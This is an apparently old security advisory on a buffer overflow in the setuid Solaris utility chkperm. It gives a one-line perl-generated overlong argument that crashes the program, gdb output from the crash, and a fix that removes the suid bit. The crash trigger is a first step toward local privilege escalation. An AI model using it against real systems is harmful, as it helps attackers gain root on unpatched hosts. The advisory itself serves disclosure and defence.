COMMAND

    /usr/vmsys/bin/chkperm

SYSTEMS AFFECTED

    Solaris 2.x

PROBLEM

    Yong   jun   Kim   found   following.      We   all   know    that
    /usr/vmsys/bin/chkperm contains a mountain of known bugs.   Here's
    one more that Yong found; The "Buffer Overflow" vulnerability.

    The  problem  occurs  when  it  gets  the argument. It accepts the
    argument  without  checking  out  its  length, and this causes the
    problem.   It  seems  that  this  vulnerability  also  applies  to
    Solaris7, the latest version.

        [Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
        Segmentation fault (core dumped)
        [hackerslab:/users/loveyou/buf]$ gdb chkperm core
        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        There is absolutely no warranty for GDB; type "show warranty" for details.
        GDB 4.16 (sparc-sun-solaris2.5.1),
        Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
        Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        xxxxxxxxxxxxxxxxxxxxxx'.
        Program terminated with signal 11, Segmentation fault.
        Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
        Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
        Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
        (no debugging symbols found)...done.
        #0  0xef73ea68 in nvmatch ()

SOLUTION

    It is recommended that the suid bit is removed from chkperm using
    command:

        chmod 400 /usr/vmsys/bin/chkperm

    It is _NOT_ exploitable under i386.